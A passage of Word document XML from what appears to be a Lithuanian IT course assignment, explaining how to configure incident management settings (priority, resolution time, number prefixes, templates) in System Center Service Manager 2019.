        <w:t>okinys turi pateikti įdiegtos virtualios mašinos (VirtualBox arba VMware workstation player) ir System Center Service Manager 2019 operacinės sistemos ir sukurto incidento</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ekrano atvaizdus</w:t>
      </w:r>
      <w:r w:rsidR="0BA666D4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> arba aprašym</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidR="0BA666D4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D924E4" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="0BA666D4" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pavyzdys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0129DD9E" w14:textId="07C0FDE6" w:rsidR="0B77EE6E" w:rsidRPr="005A5C28" w:rsidRDefault="0B77EE6E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14A76C50" w14:textId="1BCA0FBE" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="0BA666D4" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Konfigūruokite incidentų valdymą „Service Manager“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A14AB6" w14:textId="194E9C46" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="0BA666D4" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Kelios „Service Manager“ funkcijos leidžia supaprastinti incidentų kūrimą. </w:t>
      </w:r>
      <w:r w:rsidR="5F28CB88" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Per</w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="5F28CB88" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">,Service Manager” </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>galite sukonfigūruoti tokius įvykių parametrus kaip:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C52848" w14:textId="42814F4D" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="0BA666D4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prioritetiniai skaičiavimai, pagrįsti poveikiu ir skubumu</w:t>
      </w:r>
      <w:r w:rsidR="004F279C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72384580" w14:textId="75CC13E3" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="0BA666D4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Tikslinės rezoliucijos laikas</w:t>
      </w:r>
      <w:r w:rsidR="004F279C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD5C82F" w14:textId="3123E047" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="0BA666D4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Priešdėliai, kurie naudojami įvykių skaičiams</w:t>
      </w:r>
      <w:r w:rsidR="004F279C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2584A310" w14:textId="5AC03CAA" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="4E7128BC" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="0BA666D4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>aiko</w:t>
      </w:r>
      <w:r w:rsidR="7330D12E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> nustatymas</w:t>
      </w:r>
      <w:r w:rsidR="01210ADF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="7330D12E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> kiek</w:t>
      </w:r>
      <w:r w:rsidR="77341038" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> laiko</w:t>
      </w:r>
      <w:r w:rsidR="0BA666D4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> uždaras incidentas </w:t>
      </w:r>
      <w:r w:rsidR="65FA9992" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>gali likti</w:t>
      </w:r>
      <w:r w:rsidR="0BA666D4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> „Service Manager“ duomenų bazėje</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B737BDA" w14:textId="7D7C52E2" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="591D127F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2838E9A6" w14:textId="0CB96172" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="0BA666D4" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Galite sukurti įvykio šabloną, kad užpildytumėte tam tikrus laukus pagal nurodytą įvykio tipą, pvz., </w:t>
      </w:r>
      <w:r w:rsidR="004F279C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">u el. </w:t>
      </w:r>
      <w:r w:rsidR="004F279C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">aštu susijusias problemas. Pagalbos tarnybos darbuotojai kurdami incidentus naudoja šablonus. Šablonas užpildo kai kuriuos įvykio laukus, pvz., </w:t>
      </w:r>
      <w:r w:rsidR="004F279C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>alaikymo analitiko, kuris tvarko su el.</w:t>
      </w:r>
      <w:r w:rsidR="00E57374" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F279C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>aštu susijusias problemas, vardą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108B2922" w14:textId="1332EA78" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="0BA666D4" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Galite konfigūruoti įvykių valdymą</w:t>
      </w:r>
      <w:r w:rsidR="1FB9DACF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> arba</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> automatiškai generuoti įvykius pagal norim</w:t>
      </w:r>
      <w:r w:rsidR="4FD853CD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>us</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> konfigūracijos element</w:t>
      </w:r>
      <w:r w:rsidR="043D1D2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>us</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, kurie neatitinka</w:t>
      </w:r>
      <w:r w:rsidR="185FF388" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> konfigūracijos valdymo</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> reikalavimų</w:t>
      </w:r>
      <w:r w:rsidR="0DCE60DE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tai veikia tik tuo atveju, jei jūsų aplinkoje yra įdiegta „Configuration Manager“ su norimomis konfigūracijos valdymo bazinėmis linijomis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260B87CC" w14:textId="16EEC825" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="0BA666D4" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Galite apibrėžti incidento prioritetą pagal poveikį ir skubumą, nurodyti sprendimo laiką atsižvelgdami į įvykio prioritetą, sukurti įvykio šabloną ir sukurti naują įvykį pagal norimą konfigūracijos valdymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C6BAF2" w14:textId="5775B185" w:rsidR="00F31708" w:rsidRPr="005A5C28" w:rsidRDefault="004F279C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Darbo eiga:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702FC713" w14:textId="1BCA0FBE" w:rsidR="591D127F" w:rsidRPr="005A5C28" w:rsidRDefault="0BA666D4" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
        <w:t>Konfigūruokite incidento nustatymus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3233A4" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="1621FF1D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>„Service Manager“ visi įvykių numeriai prasideda „IR“. Tačiau galite pakeisti priešdėlį, kuris naudojamas jūsų įvykių numeriams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC3E83D" w14:textId="15414497" w:rsidR="00091991" w:rsidRPr="005A5C28" w:rsidRDefault="1621FF1D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Organizacijos politika gali apriboti failų, kuriuos galima pridėti prie kiekvieno įvykio, skaičių ne daugiau kaip penkis, o didžiausi</w:t>
      </w:r>
      <w:r w:rsidR="1249D05D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> kiekvieno failo </w:t>
      </w:r>
      <w:r w:rsidR="098EDEF6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>dydis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> - 500 kilobaitų (KB).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B31014E" w14:textId="700AF4B9" w:rsidR="003672F1" w:rsidRPr="005A5C28" w:rsidRDefault="4526F41D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Incidento prioriteto apskaičiavimas vertinamas skalėje nuo 1 iki 9. Pirmenybė </w:t>
      </w:r>
      <w:r w:rsidR="2C3B6A45" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>suteikiama 1, kuris</w:t>
      </w:r>
      <w:r w:rsidR="0024358D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1D08B6B6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>turi</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="651CD9E7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>aukščiausią</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> prioritet</w:t>
      </w:r>
      <w:r w:rsidR="2EF25938" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. Poveikio ir skubos nustatymai apibrėžiami kaip „Aukštas“, „Vidutinis“ arba „Žemas“ ir jie sukonfigūruojami sukūrus incidentą. Šioje lentelėje parodyta, kaip apibrėžti įvykio prioritetą kiekvienam galimam poveikio ir skubos deriniui.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EFA6D7" w14:textId="1BCA0FBE" w:rsidR="008A5CEE" w:rsidRPr="005A5C28" w:rsidRDefault="01C9E0D1" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71CE4CEB" wp14:editId="65D52311">
            <wp:extent cx="3209925" cy="1276350"/>
            <wp:effectExtent l="19050" t="19050" r="28575" b="19050"/>
            <wp:docPr id="1437397645" name="Picture 143739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397645"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId246">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3209925" cy="1276350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4DD3E4" w14:textId="2F9DB361" w:rsidR="1B767647" w:rsidRPr="005A5C28" w:rsidRDefault="00037E6B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="7B5AFED1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pav. Įvykio prioritetas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AB434F" w14:textId="3B929EDF" w:rsidR="1B767647" w:rsidRPr="005A5C28" w:rsidRDefault="2F887C91" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Šaltinis: Configure incident settings</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. (2016, gruodžio 10). </w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Microsoft.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId247">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/system-center/scsm/incident-mgt?view=sc-sm-2019</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="108E927F" w14:textId="1BCA0FBE" w:rsidR="46EC3997" w:rsidRPr="005A5C28" w:rsidRDefault="46EC3997" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AA40BAD" w14:textId="0B7E09FC" w:rsidR="765953FF" w:rsidRPr="005A5C28" w:rsidRDefault="40814FE0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Sprendimo laikas nurodo, kiek laiko</w:t>
      </w:r>
      <w:r w:rsidR="00406A21" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> reikia</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00406A21" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">skirti, kad problema būtų </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>išspręst</w:t>
      </w:r>
      <w:r w:rsidR="00406A21" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="69BF9C38" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sprendimo laikas yra pagrįstas prioritetu. Paprastai turėtumėte nustatyti didesnio prioriteto įvykių sprendimo laiką. Šiame </w:t>
      </w:r>
      <w:r w:rsidR="6C7AE359" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pavyzdyje</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
